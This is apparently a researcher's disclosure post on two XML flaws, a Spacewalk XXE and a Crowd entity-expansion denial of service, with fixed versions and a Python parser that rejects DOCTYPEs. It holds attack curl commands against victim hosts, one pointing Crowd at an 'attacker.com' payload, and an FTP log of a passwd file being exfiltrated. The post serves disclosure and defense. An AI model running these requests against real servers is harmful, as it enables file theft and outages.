Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H 'Content-Type: application/xml' --data @xxe-ftp-exfil.xml

With an FTP listener running, executing the call shows the remote DTD being fetched, followed by the exfiltration of the local file:

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: [email protected]
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection

CVE-2019-20104 – Atlassian Crowd OpenID client vulnerable to Remote DoS via XML Entity Expansion

Atlassian Crowd is a single sign-on and user identity solution for the web. Crowd ships with a built-in OpenID client for testing OpenID integrations. By pointing that test client at a URL hosting a malicious payload, an attacker can remotely DoS the Crowd instance through XML entity expansion, which consumes all available memory and crashes the application.

After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.

Proof of Concept XML XRDS payload:

Once the payload is hosted somewhere, invoking the following will make the Crowd instance fetch and parse it:

curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'

Now, the server will expand entities until memory is consumed and produce output such as:

Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
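Both issues on this page come down to the same parser behaviour: the XML-RPC endpoint (Spacewalk) and the OpenID test client (Crowd) honour a DTD sent by an untrusted party. As an added illustration of the fix, and not code from Spacewalk, Crowd or this post, the following Python routine refuses any DOCTYPE before a single entity is declared, so neither an external entity nor nested internal entities are ever processed. The XML-RPC sample documents and the method name `example.ping` are constructed for the demo.

```python
import xml.parsers.expat


class DtdForbidden(ValueError):
    """The document carries a DOCTYPE or references an external entity."""


def parse_naive(xml_bytes: bytes) -> str:
    """Default expat behaviour: DTD-declared entities are expanded silently,
    which is exactly what both bugs on this page rely on."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def parse_without_dtd(xml_bytes: bytes) -> dict:
    """Abort the moment a DOCTYPE appears: XXE needs an external entity and an
    expansion DoS needs nested internal entities, and both live in the DTD, so
    refusing it stops either before any fetch or expansion can happen."""
    parser = xml.parsers.expat.ParserCreate()
    tags, chunks = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} is not accepted on this endpoint")

    def on_external_ref(context, base, sysid, pubid):  # belt and braces
        raise DtdForbidden(f"external entity {sysid!r} will not be fetched")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda tag, attrs: tags.append(tag)
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return {"root": tags[0], "text": "".join(chunks)}


def accepts(xml_bytes: bytes) -> bool:
    """True when the hardened parser accepts the document, False when it rejects."""
    try:
        parse_without_dtd(xml_bytes)
        return True
    except DtdForbidden:
        return False


# Constructed samples: a plain XML-RPC call, and the same call smuggling an
# internal entity in through a DOCTYPE. "example.ping" is a made-up method name.
PLAIN = b"<?xml version='1.0'?><methodCall><methodName>example.ping</methodName></methodCall>"
WITH_DTD = (b"<?xml version='1.0'?><!DOCTYPE methodCall [<!ENTITY m 'example.ping'>]>"
            b"<methodCall><methodName>&m;</methodName></methodCall>")
```

The naive parser returns `example.ping` for both documents, hiding the DTD entirely, while the hardened one accepts only the plain call; Java parsers offer the same cut-off through the `http://apache.org/xml/features/disallow-doctype-decl` feature.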

Atlassian has responded to the issue via its bug bounty program on Bugcrowd.com/atlassian and has issued fixes.

Crowd has been fixed as of the following versions:

  • 3.2.11
  • 3.3.8
  • 3.4.7
  • 3.5.2
  • 3.6.2
  • 3.7.1
  • 4.0.0

CVE and CWD references:

https://jira.atlassian.com/browse/CWD-5526

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104

Happy Hunting 😊